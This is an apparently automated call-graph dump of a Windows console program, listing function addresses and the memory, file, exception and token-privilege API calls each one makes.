73523->73516 73523->73517 73523->73519 73523->73522 73526 3a7c61 memcpy 73523->73526 73705 3a70ea 73523->73705 73708 3a7a40 73523->73708 73726 3a7cc3 6 API calls 73523->73726 73727 3912a5 73523->73727 73732 38429a 73523->73732 73738 3a74eb malloc _CxxThrowException memcpy __EH_prolog ctype 73523->73738 73739 3a7193 73523->73739 73526->73523 73529 381fbd __EH_prolog 73528->73529 73757 3826dd 73529->73757 73535 381fed 73767 381e40 free 73535->73767 73537 381ff5 73768 381e40 free 73537->73768 73539 381ffd 73539->73303 73540->73314 73541->73320 73542->73319 73543->73329 73544->73329 73545->73329 73546->73326 73547->73330 73548->73345 73549->73345 73550->73345 73551->73345 
73552->73345 73553->73345 73554->73345 73555->73335 73556->73344 73557->73344 73558->73344 73559->73344 73560->73344 73561->73340 73562->73346 73563->73346 73564->73346 73565->73346 73580->73388 73665 382f1c 73581->73665 73584 391f7e 73584->73397 73624 3a1d73 5 API calls __EH_prolog 73584->73624 73585 3929fe 73668 381e40 free 73585->73668 73587 392ab3 __EH_prolog 73586->73587 73598 392b0f 73587->73598 73672 382e8a 73587->73672 73590 3922ad 73590->73427 73590->73430 73592 392b04 73677 381e40 free 73592->73677 73593 392bc6 73682 3a1d73 5 API calls __EH_prolog 73593->73682 73596 392bd6 _CxxThrowException 73596->73590 73598->73590 73598->73593 73601 392b9f 73598->73601 73678 392cb4 48 API calls 2 library calls 73598->73678 73679 392bf5 8 API calls __EH_prolog 73598->73679 73680 392a61 malloc _CxxThrowException free _CxxThrowException memcpy 73598->73680 73601->73590 73681 3a1d73 5 API calls __EH_prolog 73601->73681 73603 392bb8 _CxxThrowException 73603->73593 73605 384fd2 73604->73605 73611 384fce 73604->73611 73683 3a7ebb 73605->73683 73608 385006 73608->73611 73688 381524 malloc _CxxThrowException __EH_prolog ctype 73608->73688 73609 384fe9 _CxxThrowException 73610 384ffe 73609->73610 73687 3c0551 malloc _CxxThrowException free memcpy ctype 73610->73687 73614 39384c 73611->73614 73617 393856 __EH_prolog 73614->73617 73615 382e04 malloc _CxxThrowException 73615->73617 73616 382fec 3 API calls 73616->73617 73617->73615 73617->73616 73618 382f88 3 API calls 73617->73618 73621 381e40 free ctype 73617->73621 73622 393917 73617->73622 73689 3c04d2 73617->73689 73695 393b76 malloc _CxxThrowException __EH_prolog ctype 73617->73695 73618->73617 73621->73617 73622->73438 73623->73395 73624->73401 73625->73408 73626->73410 73627->73413 73628->73414 73629->73421 73630->73419 73631->73428 73632->73436 73633->73474 73634->73474 73635->73477 73636->73469 73637->73482 73638->73481 73639->73488 73640->73494 73641->73500 73642->73502 73643->73508 73644->73467 73645->73451 73646->73447 
73648 393a3b 73647->73648 73649 392722 73647->73649 73697 393bd9 free ctype 73648->73697 73649->73470 73649->73473 73651 393a42 73652 393a52 _CxxThrowException 73651->73652 73653 393a67 73651->73653 73654 393a6f 73651->73654 73652->73653 73698 3c0551 malloc _CxxThrowException free memcpy ctype 73653->73698 73654->73649 73699 393b76 malloc _CxxThrowException __EH_prolog ctype 73654->73699 73657->73470 73658->73484 73659->73496 73660->73499 73661->73495 73662->73465 73663->73453 73664->73460 73669 382ba6 73665->73669 73667 382f2c 73667->73585 73667->73667 73668->73584 73670 381e0c ctype 2 API calls 73669->73670 73671 382bbb 73670->73671 73671->73667 73673 382ea0 73672->73673 73674 382ba6 2 API calls 73673->73674 73675 382eaf 73674->73675 73676 392a61 malloc _CxxThrowException free _CxxThrowException memcpy 73675->73676 73676->73592 73677->73598 73678->73598 73679->73598 73680->73598 73681->73603 73682->73596 73684 384fd9 73683->73684 73686 3a7ec6 73683->73686 73684->73608 73684->73609 73684->73610 73685 381e40 free ctype 73685->73686 73686->73684 73686->73685 73687->73608 73688->73608 73690 3c04df 73689->73690 73691 3c0513 73689->73691 73692 3c04fd 73690->73692 73693 3c04e8 _CxxThrowException 73690->73693 73691->73617 73696 3c0551 malloc _CxxThrowException free memcpy ctype 73692->73696 73693->73692 73695->73617 73696->73691 73697->73651 73698->73654 73699->73654 73701 3a7ef7 73700->73701 73702 3a7f14 73700->73702 73701->73702 73703 3a7193 free 73701->73703 73747 381e40 free 73701->73747 73702->73523 73703->73701 73706 382e04 2 API calls 73705->73706 73707 3a7103 73706->73707 73707->73523 73709 3a7a4a __EH_prolog 73708->73709 73748 38361b 6 API calls 2 library calls 73709->73748 73711 3a7a78 73749 38361b 6 API calls 2 library calls 73711->73749 73713 3a7b20 73751 3b2db9 free ctype 73713->73751 73715 3a7b2b 73752 3b2db9 free ctype 73715->73752 73716 382e04 malloc _CxxThrowException 73718 3a7a83 73716->73718 73718->73713 73718->73716 73720 382fec 3 API calls 
73718->73720 73721 382fec 3 API calls 73718->73721 73722 3c04d2 5 API calls 73718->73722 73725 381e40 free ctype 73718->73725 73750 3a7955 malloc _CxxThrowException __EH_prolog ctype 73718->73750 73719 3a7b37 73719->73523 73720->73718 73723 3a7aca wcscmp 73721->73723 73722->73718 73723->73718 73725->73718 73726->73523 73728 3c04d2 5 API calls 73727->73728 73729 3912ad 73728->73729 73730 381e0c ctype 2 API calls 73729->73730 73731 3912b4 73730->73731 73731->73523 73733 3842a7 73732->73733 73737 3842c5 73732->73737 73734 3842b3 73733->73734 73753 381e40 free 73733->73753 73736 381e0c ctype 2 API calls 73734->73736 73734->73737 73736->73737 73737->73523 73738->73523 73740 3a719d __EH_prolog 73739->73740 73754 3b2db9 free ctype 73740->73754 73742 3a71b3 73755 3a71d5 free __EH_prolog ctype 73742->73755 73744 3a71bf 73756 381e40 free 73744->73756 73746 3a71c7 73746->73523 73747->73701 73748->73711 73749->73718 73750->73718 73751->73715 73752->73719 73753->73734 73754->73742 73755->73744 73756->73746 73758 381e0c ctype 2 API calls 73757->73758 73759 381fcb 73758->73759 73760 382e47 73759->73760 73761 382e57 73760->73761 73762 382ba6 2 API calls 73761->73762 73763 381fda 73762->73763 73764 382010 73763->73764 73769 382033 73764->73769 73767->73537 73768->73539 73770 38203b 73769->73770 73771 382054 73770->73771 73772 382045 73770->73772 73777 3837ff 9 API calls 73771->73777 73776 38421e malloc _CxxThrowException free _CxxThrowException _CxxThrowException 73772->73776 73775 382022 fputs 73775->73535 73776->73775 73777->73775 73780 406bc6 73781 406bcd 73780->73781 73783 406bca 73780->73783 73782 406bd1 malloc 73781->73782 73781->73783 73782->73783 73784 3badb7 73785 3badc1 __EH_prolog 73784->73785 73786 3826dd 2 API calls 73785->73786 73787 3bae1d 73786->73787 73788 382e04 2 API calls 73787->73788 73789 3bae38 73788->73789 73790 382e04 2 API calls 73789->73790 73791 3bae44 73790->73791 73792 382e04 2 API calls 73791->73792 73793 3bae68 73792->73793 73800 3bad29 73793->73800 
73797 3bae94 73798 382e04 2 API calls 73797->73798 73799 3baeb2 73798->73799 73801 3bad33 __EH_prolog 73800->73801 73802 382e04 2 API calls 73801->73802 73803 3bad5f 73802->73803 73804 382e04 2 API calls 73803->73804 73805 3bad72 73804->73805 73806 3baf2d 73805->73806 73807 3baf37 __EH_prolog 73806->73807 73818 3934f4 malloc _CxxThrowException __EH_prolog 73807->73818 73809 3bafac 73810 382e04 2 API calls 73809->73810 73811 3bafbb 73810->73811 73812 382e04 2 API calls 73811->73812 73813 3bafca 73812->73813 73814 382e04 2 API calls 73813->73814 73815 3bafd9 73814->73815 73816 382e04 2 API calls 73815->73816 73817 3bafe8 73816->73817 73817->73797 73818->73809 73819 3c8eb1 73824 3c8ed1 73819->73824 73823 3c8ec9 73825 3c8edb __EH_prolog 73824->73825 73833 3c9267 73825->73833 73829 3c8efd 73838 3be5f1 free ctype 73829->73838 73831 3c8eb9 73831->73823 73832 381e40 free 73831->73832 73832->73823 73834 3c9271 __EH_prolog 73833->73834 73839 381e40 free 73834->73839 73836 3c8ef1 73837 3c922b free CloseHandle GetLastError ctype 73836->73837 73837->73829 73838->73831 73839->73836 73840 3b5475 73841 382fec 3 API calls 73840->73841 73842 3b54b4 73841->73842 73845 3bc911 73842->73845 73844 3b54bb 73846 3bc92f 73845->73846 73847 3bc926 GetTickCount 73845->73847 73857 3bc96d 73846->73857 73875 3bcb64 73846->73875 73915 382ab1 strcmp 73846->73915 73847->73846 73851 3bc9ce 73851->73875 73898 3827bb 73851->73898 73852 3bc95b 73852->73857 73916 383542 wcscmp 73852->73916 73856 3bca0a 73859 38286d 5 API calls 73856->73859 73863 3bca21 73856->73863 73857->73875 73890 3bc86a 73857->73890 73858 3bc9e2 73858->73856 73918 38286d 73858->73918 73861 3bca16 73859->73861 73925 3828fa malloc _CxxThrowException free memcpy _CxxThrowException 73861->73925 73867 38286d 5 API calls 73863->73867 73884 3bcb10 73863->73884 73870 3bca40 73867->73870 73869 3bcb59 73930 3bcb92 malloc _CxxThrowException free 73869->73930 73871 382fec 3 API calls 73870->73871 73874 3bca4e 73871->73874 73881 382033 10 API 
calls 73874->73881 73875->73844 73877 3bcb49 73929 381f91 fflush 73877->73929 73878 3bcb50 73880 3827bb 3 API calls 73878->73880 73880->73869 73889 3bca6a 73881->73889 73882 3bcaf5 73928 3828fa malloc _CxxThrowException free memcpy _CxxThrowException 73882->73928 73904 3bcb74 73884->73904 73885 382fec 3 API calls 73885->73889 73888 382033 10 API calls 73888->73889 73889->73882 73889->73885 73889->73888 73926 383599 memmove 73889->73926 73927 383402 malloc _CxxThrowException free memmove _CxxThrowException 73889->73927 73891 3bc88c __aulldiv 73890->73891 73892 3bc8d3 strlen 73891->73892 73893 3bc8f1 73892->73893 73894 3bc900 73892->73894 73893->73894 73897 38286d 5 API calls 73893->73897 73895 3828a1 5 API calls 73894->73895 73896 3bc90c 73895->73896 73896->73851 73917 382ab1 strcmp 73896->73917 73897->73893 73899 3827c7 73898->73899 73903 3827e3 73898->73903 73900 381e0c ctype 2 API calls 73899->73900 73899->73903 73901 3827da 73900->73901 73931 381e40 free 73901->73931 73903->73858 73905 3bcb1c 73904->73905 73906 3bcb7c strcmp 73904->73906 73905->73869 73907 3bc7d7 73905->73907 73906->73905 73908 3bc849 73907->73908 73910 3bc7ea 73907->73910 73911 3bc85a fputs 73908->73911 73933 381f91 fflush 73908->73933 73909 3bc7fe fputs 73909->73908 73910->73909 73932 3825cb malloc _CxxThrowException free _CxxThrowException ctype 73910->73932 73911->73877 73911->73878 73915->73852 73916->73857 73917->73851 73934 381e9d 73918->73934 73921 3828a1 73922 3828b0 73921->73922 73939 38267f 73922->73939 73924 3828bf 73924->73856 73925->73863 73926->73889 73927->73889 73928->73884 73929->73878 73930->73875 73931->73903 73932->73909 73933->73911 73935 381ea8 73934->73935 73936 381ead 73934->73936 73938 38263c malloc _CxxThrowException free memcpy _CxxThrowException 73935->73938 73936->73921 73938->73936 73940 3826c2 73939->73940 73941 382693 73939->73941 73940->73924 73942 3826c8 _CxxThrowException 73941->73942 73943 3826bc 73941->73943 73944 3826dd 73942->73944 73948 382595 malloc 
_CxxThrowException free memcpy ctype 73943->73948 73946 381e0c ctype 2 API calls 73944->73946 73947 3826ea 73946->73947 73947->73924 73948->73940 73950 4069d0 73951 4069d4 73950->73951 73952 4069d7 malloc 73950->73952 73953 391368 73955 39136d 73953->73955 73956 39138c 73955->73956 73959 417d80 WaitForSingleObject 73955->73959 73962 3bf745 73955->73962 73966 417ea0 SetEvent GetLastError 73955->73966 73960 417d98 73959->73960 73961 417d8e GetLastError 73959->73961 73960->73955 73961->73960 73963 3bf74f __EH_prolog 73962->73963 73967 3bf784 73963->73967 73965 3bf765 73965->73955 73966->73955 73968 3bf78e __EH_prolog 73967->73968 73976 3912d4 73968->73976 73971 3912d4 4 API calls 73972 3bf7d4 73971->73972 73973 3bf871 73972->73973 73984 38c4d6 73972->73984 73990 406b23 VirtualAlloc 73972->73990 73973->73965 73977 391327 73976->73977 73978 3912e7 73976->73978 73977->73971 73979 3912ef _CxxThrowException 73978->73979 73980 391304 73978->73980 73979->73980 73991 381e40 free 73980->73991 73982 39130b 73983 381e0c ctype 2 API calls 73982->73983 73983->73977 73988 38c4e9 73984->73988 73985 38c6f3 73985->73973 73988->73985 73989 38c695 memmove 73988->73989 73992 39111c 73988->73992 73997 3911b4 73988->73997 73989->73988 73990->73973 73991->73982 73994 391130 73992->73994 73993 39115f 73993->73988 73994->73993 74002 38b668 73994->74002 74021 38d331 73994->74021 73999 3911c1 73997->73999 73998 3911eb 73998->73988 73999->73998 74042 3caf27 73999->74042 74049 3cae7c 73999->74049 74018 38b675 74002->74018 74005 38b8aa GetLastError 74010 38b6aa 74005->74010 74006 38b81b 74009 38b839 memcpy 74006->74009 74006->74010 74008 38b7e7 74012 387731 5 API calls 74008->74012 74019 38b864 74008->74019 74009->74010 74010->73994 74011 38b811 74039 38b8ec GetLastError 74011->74039 74014 38b80d 74012->74014 74013 38b7ad 74013->74018 74020 38b8c7 74013->74020 74037 406a20 VirtualAlloc 74013->74037 74014->74011 74014->74019 74018->74006 74018->74008 74018->74010 74018->74011 74018->74013 
74018->74019 74029 387731 74018->74029 74038 387b4f ReadFile 74018->74038 74025 387b7c 74019->74025 74020->74010 74022 38d355 74021->74022 74023 38d374 74022->74023 74024 38b668 10 API calls 74022->74024 74023->73994 74024->74023 74026 387b89 74025->74026 74040 387b4f ReadFile 74026->74040 74028 387b9a 74028->74005 74028->74010 74030 38775c SetFilePointer 74029->74030 74032 387740 74029->74032 74031 387780 GetLastError 74030->74031 74034 3877a1 74030->74034 74033 38778c 74031->74033 74031->74034 74032->74030 74041 3876d6 SetFilePointer GetLastError 74033->74041 74034->74018 74036 387796 SetLastError 74036->74034 74037->74013 74038->74018 74039->74010 74040->74028 74041->74036 74045 3caf36 74042->74045 74043 3cb010 74043->73999 74044 3caeeb 107 API calls 74044->74045 74045->74043 74045->74044 74054 38bd0c 74045->74054 74059 3cad3a 74045->74059 74063 3caebf 107 API calls 74045->74063 74050 3cae86 74049->74050 74052 397140 7 API calls 74050->74052 74667 397190 74050->74667 74051 3caebb 74051->73999 74052->74051 74064 387ca2 74054->74064 74057 38bd3d 74057->74045 74060 3cad44 __EH_prolog 74059->74060 74072 396305 74060->74072 74061 3cadbf 74061->74045 74063->74045 74066 387caf 74064->74066 74067 387cdb 74066->74067 74069 387c68 74066->74069 74067->74057 74068 38b8ec GetLastError 74067->74068 74068->74057 74070 387c79 WriteFile 74069->74070 74071 387c76 74069->74071 74070->74066 74071->74070 74073 39630f __EH_prolog 74072->74073 74109 3962b9 74073->74109 74076 396427 74078 38965d VariantClear 74076->74078 74077 39644a 74113 38965d 74077->74113 74101 396445 74078->74101 74088 3965de 74089 39669e 74088->74089 74090 3965e7 74088->74090 74096 3966b8 74089->74096 74097 396754 74089->74097 74089->74101 74094 381e0c ctype 2 API calls 74090->74094 74095 3965f6 74090->74095 74091 3964da 74091->74088 74091->74101 74278 39789c free memmove ctype 74091->74278 74094->74095 74279 3a36ea 74095->74279 74100 381e0c ctype 2 API calls 74096->74100 74166 395bea 74097->74166 74099 39666b 
74292 381e40 free 74099->74292 74100->74101 74101->74061 74102 3964ca 74102->74091 74102->74101 74277 3842e3 CharUpperW 74102->74277 74103 39665c 74291 3831e5 malloc _CxxThrowException free _CxxThrowException 74103->74291 74110 3962c9 74109->74110 74293 3a8fa4 74110->74293 74114 389685 74113->74114 74115 389665 74113->74115 74117 395126 74114->74117 74115->74114 74116 38967e VariantClear 74115->74116 74116->74114 74118 395130 __EH_prolog 74117->74118 74119 3951b4 74118->74119 74125 39518e 74118->74125 74337 383097 malloc _CxxThrowException free SysStringLen ctype 74118->74337 74122 38965d VariantClear 74119->74122 74119->74125 74121 38965d VariantClear 74123 39527f 74121->74123 74124 3951bc 74122->74124 74123->74101 74159 3a8b05 74123->74159 74124->74125 74126 395289 74124->74126 74127 395206 74124->74127 74125->74121 74126->74125 74129 395221 74126->74129 74338 383097 malloc _CxxThrowException free SysStringLen ctype 74127->74338 74130 38965d VariantClear 74129->74130 74131 39522d 74130->74131 74131->74123 74132 395351 74131->74132 74339 395459 malloc _CxxThrowException __EH_prolog 74131->74339 74132->74123 74139 3953a1 74132->74139 74344 3835e7 memmove 74132->74344 74135 3952ba 74340 388011 5 API calls ctype 74135->74340 74137 3952cf 74153 3952fd 74137->74153 74341 38823d 10 API calls 2 library calls 74137->74341 74139->74123 74345 3843b7 5 API calls 2 library calls 74139->74345 74142 3952e5 74143 382fec 3 API calls 74142->74143 74146 3952f5 74143->74146 74144 39540e 74347 39789c free memmove ctype 74144->74347 74145 3953df 74145->74144 74150 39541c 74145->74150 74346 3842e3 CharUpperW 74145->74346 74342 381e40 free 74146->74342 74151 3a36ea 5 API calls 74150->74151 74152 395427 74151->74152 74154 382fec 3 API calls 74152->74154 74343 3954a0 free ctype 74153->74343 74155 395433 74154->74155 74348 381e40 free 74155->74348 74157 39543b 74349 3b2db9 free ctype 74157->74349 74160 3a8b2e 74159->74160 74161 38965d VariantClear 74160->74161 74162 39648a 74161->74162 
74162->74101 74163 394d78 74162->74163 74350 3a9262 74163->74350 74167 395bf4 __EH_prolog 74166->74167 74357 3954c0 74167->74357 74170 3a8b05 VariantClear 74171 395c34 74170->74171 74224 395e17 74171->74224 74372 395630 74171->74372 74174 3a36ea 5 API calls 74175 395c51 74174->74175 74176 395c60 74175->74176 74477 3957c1 53 API calls 2 library calls 74175->74477 74178 382f1c 2 API calls 74176->74178 74179 395c6c 74178->74179 74224->74101 74276 395110 9 API calls 74276->74102 74277->74102 74278->74088 74280 3a36f4 __EH_prolog 74279->74280 74281 382e04 2 API calls 74280->74281 74282 3a370a 74281->74282 74283 3a3736 74282->74283 74665 381089 malloc _CxxThrowException free _CxxThrowException 74282->74665 74666 3831e5 malloc _CxxThrowException free _CxxThrowException 74282->74666 74284 382f1c 2 API calls 74283->74284 74287 3a3742 74284->74287 74664 381e40 free 74287->74664 74289 396633 74289->74099 74289->74103 74290 381089 malloc _CxxThrowException free _CxxThrowException 74289->74290 74290->74103 74291->74099 74292->74101 74294 3a8fae __EH_prolog 74293->74294 74295 3a7ebb free 74294->74295 74296 3a8ff2 74295->74296 74327 3a8b64 74296->74327 74300 3a9020 74301 382fec 3 API calls 74300->74301 74309 396302 74300->74309 74302 3a903a 74301->74302 74315 3a904d 74302->74315 74331 3a8b80 VariantClear 74302->74331 74304 3a91b0 74334 3a8b9c 10 API calls 2 library calls 74304->74334 74305 3a9244 74336 3843b7 5 API calls 2 library calls 74305->74336 74306 3a9144 74310 382f88 3 API calls 74306->74310 74313 3a917b 74306->74313 74309->74076 74309->74077 74309->74101 74310->74313 74311 3a9100 74314 38965d VariantClear 74311->74314 74312 3a90d6 74312->74311 74316 3a90e7 74312->74316 74333 3a8f2e 9 API calls 74312->74333 74313->74304 74313->74305 74314->74309 74315->74306 74315->74309 74315->74311 74315->74312 74332 383097 malloc _CxxThrowException free SysStringLen ctype 74315->74332 74322 38965d VariantClear 74316->74322 74317 3a91c0 74317->74309 74320 382f88 3 API calls 74317->74320 
74324 3a91ff 74320->74324 74321 3a9112 74321->74311 74323 3a8b64 VariantClear 74321->74323 74322->74306 74325 3a9123 74323->74325 74324->74309 74335 3850ff free ctype 74324->74335 74325->74311 74325->74316 74328 3a8b05 VariantClear 74327->74328 74329 3a8b6f 74328->74329 74329->74309 74330 3a8f2e 9 API calls 74329->74330 74330->74300 74331->74315 74332->74312 74333->74321 74334->74317 74335->74309 74336->74309 74337->74119 74338->74129 74339->74135 74340->74137 74341->74142 74342->74153 74343->74132 74344->74132 74345->74145 74346->74145 74347->74150 74348->74157 74349->74123 74351 3a926c __EH_prolog 74350->74351 74352 3a92fc 74351->74352 74356 3a92a4 74351->74356 74353 38965d VariantClear 74352->74353 74355 394d91 74353->74355 74354 38965d VariantClear 74354->74355 74355->74101 74355->74102 74355->74276 74356->74354 74358 3954ca __EH_prolog 74357->74358 74360 38965d VariantClear 74358->74360 74362 395507 74358->74362 74359 38965d VariantClear 74361 395567 74359->74361 74363 395528 74360->74363 74361->74170 74361->74224 74362->74359 74363->74362 74364 395572 74363->74364 74365 38965d VariantClear 74364->74365 74366 39558e 74365->74366 74506 394cac VariantClear __EH_prolog 74366->74506 74368 3955a1 74368->74361 74507 394cac VariantClear __EH_prolog 74368->74507 74370 3955b8 74370->74361 74508 394cac VariantClear __EH_prolog 74370->74508 74373 39563a __EH_prolog 74372->74373 74376 395679 74373->74376 74509 3a3558 10 API calls 2 library calls 74373->74509 74375 39571a 74375->74174 74376->74375 74377 382f1c 2 API calls 74376->74377 74378 395696 74377->74378 74510 3a3333 malloc _CxxThrowException free 74378->74510 74380 3956a2 74381 3956ad 74380->74381 74382 3956c5 74380->74382 74511 397853 5 API calls 2 library calls 74381->74511 74383 3956b4 74382->74383 74512 384adf wcscmp 74382->74512 74477->74176 74506->74368 74507->74370 74508->74361 74509->74376 74510->74380 74511->74383 74664->74289 74665->74282 74666->74282 74668 39719a __EH_prolog 74667->74668 74669 3971b0 
74668->74669 74673 3971dd 74668->74673 74670 394d78 VariantClear 74669->74670 74672 3971b7 74670->74672 74672->74051 74680 396fc5 74673->74680 74674 3972b4 74675 394d78 VariantClear 74674->74675 74676 3972c0 74674->74676 74675->74676 74676->74672 74677 397140 7 API calls 74676->74677 74677->74672 74678 397236 74678->74672 74678->74674 74679 3972a3 SetFileSecurityW 74678->74679 74679->74674 74681 396fcf __EH_prolog 74680->74681 74706 3944a6 74681->74706 74683 39706a 74709 3968ac 74683->74709 74688 39709e 74733 381e40 free 74688->74733 74689 397051 74689->74683 74694 3911b4 107 API calls 74689->74694 74690 397029 74690->74683 74728 394dff 7 API calls 2 library calls 74690->74728 74693 3970c0 74729 386096 15 API calls 2 library calls 74693->74729 74694->74683 74695 39712e 74695->74678 74697 3970e2 74702 3970e6 74697->74702 74731 396b5e 69 API calls 2 library calls 74697->74731 74698 3970d1 74698->74697 74730 394dff 7 API calls 2 library calls 74698->74730 74701 3970fd 74701->74702 74703 397103 74701->74703 74702->74688 74732 381e40 free 74703->74732 74705 39710b 74705->74695 74707 382e04 2 API calls 74706->74707 74708 3944be 74707->74708 74708->74683 74708->74690 74727 396e71 12 API calls 2 library calls 74708->74727 74710 3968b6 __EH_prolog 74709->74710 74711 396921 74710->74711 74713 387d4b 6 API calls 74710->74713 74724 3968c5 74710->74724 74712 396962 74711->74712 74715 396998 74711->74715 74736 396a17 6 API calls 2 library calls 74711->74736 74712->74715 74737 382dcd malloc _CxxThrowException 74712->74737 74718 396906 74713->74718 74714 3969e1 74740 38bcf8 CloseHandle 74714->74740 74715->74714 74734 387c3b SetFileTime 74715->74734 74718->74711 74735 394dff 7 API calls 2 library calls 74718->74735 74721 39697a 74738 396b09 13 API calls __EH_prolog 74721->74738 74724->74688 74724->74693 74725 39698c 74739 381e40 free 74725->74739 74727->74690 74728->74689 74729->74698 74730->74697 74731->74701 74732->74705 74733->74695 74734->74714 74735->74711 74736->74712 
74737->74721 74738->74725 74739->74715 74740->74724 74741 3ba42c 74742 3ba449 74741->74742 74743 3ba435 fputs 74741->74743 74900 3b545d 74742->74900 74899 381fa0 fputc 74743->74899 74747 382e04 2 API calls 74748 3ba4a1 74747->74748 74904 3a1858 74748->74904 74750 3ba4c9 74966 381e40 free 74750->74966 74752 3ba4d8 74753 3ba4ee 74752->74753 74755 3bc7d7 ctype 6 API calls 74752->74755 74754 3ba50e 74753->74754 74967 3b57fb 74753->74967 74977 3bc73e 74754->74977 74755->74753 74759 3baae5 75132 3b2db9 free ctype 74759->75132 74761 3bac17 75133 3b2db9 free ctype 74761->75133 74762 381e0c ctype 2 API calls 74764 3ba53a 74762->74764 74766 3ba54d 74764->74766 75103 3bb0fa malloc _CxxThrowException __EH_prolog 74764->75103 74765 3bac23 74767 3bac3a 74765->74767 74769 3bac35 74765->74769 74772 382fec 3 API calls 74766->74772 75135 3bb96d _CxxThrowException 74767->75135 75134 3bb988 33 API calls __aulldiv 74769->75134 74771 3bac42 75136 381e40 free 74771->75136 74778 3ba586 74772->74778 74775 3bac4d 74776 3a3247 free 74775->74776 74777 3bac5d 74776->74777 75137 381e40 free 74777->75137 74995 3bad06 74778->74995 74782 3bac7d 75138 3811c2 free __EH_prolog ctype 74782->75138 74786 3bac89 75139 3bbe0c free __EH_prolog ctype 74786->75139 74787 393a29 5 API calls 74789 3ba62e 74787->74789 74791 382e04 2 API calls 74789->74791 74790 3bac98 75140 3b2db9 free ctype 74790->75140 74792 3ba636 74791->74792 75003 3a4345 74792->75003 74899->74742 74901 3b5473 74900->74901 74902 3b5466 74900->74902 74901->74747 75141 38275e malloc _CxxThrowException free ctype 74902->75141 74905 3a1862 __EH_prolog 74904->74905 75142 3a021a 74905->75142 74910 3a18b9 75156 3a1aa5 free __EH_prolog ctype 74910->75156 74912 3a1935 75161 3a1aa5 free __EH_prolog ctype 74912->75161 74913 3a18c7 75157 3b2db9 free ctype 74913->75157 74916 3a1944 74937 3a1966 74916->74937 75162 3a1d73 5 API calls __EH_prolog 74916->75162 74918 3a18d3 74918->74750 74920 3c04d2 5 API calls 74926 3a18db 74920->74926 74921 3a1958 
_CxxThrowException 74921->74937 74922 3a19be 75169 3af1f1 malloc _CxxThrowException free _CxxThrowException 74922->75169 74925 382e04 2 API calls 74925->74937 74926->74912 74926->74920 75158 3a0144 malloc _CxxThrowException free _CxxThrowException 74926->75158 75159 381524 malloc _CxxThrowException __EH_prolog ctype 74926->75159 75160 381e40 free 74926->75160 74928 3a19d6 74929 3a7ebb free 74928->74929 74931 3a19e1 74929->74931 74933 3912d4 4 API calls 74931->74933 74932 3c04d2 5 API calls 74932->74937 74934 3a19ea 74933->74934 74936 3a7ebb free 74934->74936 74938 3a19f7 74936->74938 74937->74922 74937->74925 74937->74932 75163 38631f 74937->75163 75167 381524 malloc _CxxThrowException __EH_prolog ctype 74937->75167 75168 381e40 free 74937->75168 74939 3912d4 4 API calls 74938->74939 74948 3a19ff 74939->74948 74941 3a1a4f 75171 381e40 free 74941->75171 74942 381524 malloc _CxxThrowException 74942->74948 74944 3a1a57 75172 3b2db9 free ctype 74944->75172 74946 3a1a64 75173 3b2db9 free ctype 74946->75173 74948->74941 74948->74942 74950 3a1a83 74948->74950 75170 3842e3 CharUpperW 74948->75170 75174 3a1d73 5 API calls __EH_prolog 74950->75174 74952 3a1a97 _CxxThrowException 74953 3a1aa5 __EH_prolog 74952->74953 75175 381e40 free 74953->75175 74955 3a1ac8 75176 3a02e8 free ctype 74955->75176 74957 3a1ad1 75177 3a1eab free __EH_prolog ctype 74957->75177 74959 3a1add 75178 381e40 free 74959->75178 74961 3a1ae5 75179 381e40 free 74961->75179 74963 3a1aed 75180 3b2db9 free ctype 74963->75180 74965 3a1afa 74965->74750 74966->74752 74968 3b5805 __EH_prolog 74967->74968 74969 3826dd 2 API calls 74968->74969 74976 3b5847 74968->74976 74970 3b5819 74969->74970 75360 3b5678 74970->75360 74974 3b583f 75377 381e40 free 74974->75377 74976->74754 74978 3bc748 __EH_prolog 74977->74978 74979 3bc7d7 ctype 6 API calls 74978->74979 74980 3bc75d 74979->74980 75394 381e40 free 74980->75394 74982 3bc768 75395 3a2c0b 74982->75395 74986 3bc77d 75401 381e40 free 74986->75401 74988 3bc785 75402 
381e40 free 74988->75402 74990 3bc78d 75403 381e40 free 74990->75403 74992 3bc795 74993 3a2c0b ctype free 74992->74993 74994 3ba51d 74993->74994 74994->74759 74994->74762 74996 3bad29 2 API calls 74995->74996 74997 3ba5d8 74996->74997 74998 3bbf3e 74997->74998 74999 382fec 3 API calls 74998->74999 75000 3bbf85 74999->75000 75001 382fec 3 API calls 75000->75001 75002 3ba5ee 75001->75002 75002->74787 75004 3a434f __EH_prolog 75003->75004 75103->74766 75132->74761 75133->74765 75134->74767 75135->74771 75136->74775 75137->74782 75138->74786 75139->74790 75141->74901 75143 3a0224 __EH_prolog 75142->75143 75181 393d66 75143->75181 75146 3a062e 75152 3a0638 __EH_prolog 75146->75152 75147 3a06de 75268 3a019a malloc _CxxThrowException free memcpy 75147->75268 75149 3a06e6 75269 3a1453 26 API calls 2 library calls 75149->75269 75151 3a06ee 75151->74910 75151->74926 75152->75147 75152->75151 75153 3a01bc malloc _CxxThrowException free _CxxThrowException memcpy 75152->75153 75197 3a0703 75152->75197 75267 3b2db9 free ctype 75152->75267 75153->75152 75156->74913 75157->74918 75158->74926 75159->74926 75160->74926 75161->74916 75162->74921 75164 389245 75163->75164 75308 3890da 75164->75308 75167->74937 75168->74937 75169->74928 75170->74948 75171->74944 75172->74946 75173->74918 75174->74952 75175->74955 75176->74957 75177->74959 75178->74961 75179->74963 75180->74965 75192 41fb10 75181->75192 75183 393d70 GetCurrentProcess 75193 393e04 75183->75193 75185 393d8d OpenProcessToken 75186 393d9e LookupPrivilegeValueW 75185->75186 75187 393de3 75185->75187 75186->75187 75188 393dc0 AdjustTokenPrivileges 75186->75188 75189 393e04 CloseHandle 75187->75189 75188->75187 75190 393dd5 GetLastError 75188->75190 75191 393def 75189->75191 75190->75187 75191->75146 75192->75183 75194 393e0d 75193->75194 75195 393e11 CloseHandle 75193->75195 75194->75185 75196 393e21 75195->75196 75196->75185 75265 3a070d __EH_prolog 75197->75265 75198 3a0b40 75198->75152 75199 3a0e1d 75305 3a0416 18 API 
